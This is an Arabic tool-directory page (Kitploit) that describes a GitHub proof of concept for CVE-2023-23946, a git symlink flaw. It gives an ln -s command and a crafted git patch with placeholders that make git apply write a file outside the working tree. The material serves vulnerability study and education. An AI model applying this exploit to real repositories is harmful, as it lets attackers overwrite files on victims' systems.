Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-23946-POC — شرح وإثبات المفهوم (POC) لثغرة CVE-2023-23946 | Kitploit
أدوات/GitHubGitHub/bruno-1337/cve-2023-23946-poc
تحليل الثغرات الأمنيةالاستغلالالأوراق والأبحاثالتعلم والتعليماستغلال الملفات الثنائية
GitHubbruno-1337/cve-2023-23946-poc

CVE-2023-23946-POC

شرح وإثبات المفهوم (POC) لثغرة CVE-2023-23946

عرض المستودع
11منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2023-23946 POC

شرح وPOC لـ CVE-2023-23946

سبب ثغرة CVE-2023-23946 هو خلل في طريقة تعامل git مع الروابط الرمزية. عندما ينشئ git رابطًا رمزيًا، فإنه لا يتعامل معه فعليًا كرابط رمزي، ولهذا يمكننا استغلاله للإشارة إلى ملفات خارج شجرة العمل.

أولاً، أنشئ رابطًا رمزيًا

root@kitploit:~
ln -s [PATH_YOU_WANT_TO_ACCESS_OUTSITE_WORKING_TREE] symlink

الآن أنشئ تصحيحًا لاستخدامه مع git apply

root@kitploit:~
diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/[FILE_OUTSIDE]
@@ -0,0 +1 @@
+[WHAT_YOU_WANT_INSIDE_THE_FILE]
\ No newline at end of file

ماذا يفعل هذا التصحيح؟ نقوم بتغيير اسم الرابط الرمزي الحالي وإنشاء ملف جديد. بهذه الطريقة، عندما نعدّل /newsymlink/[FILE_OUTSIDE]، لا يطبّق git حماياته ضد الروابط الرمزية.

تنزيل الأداة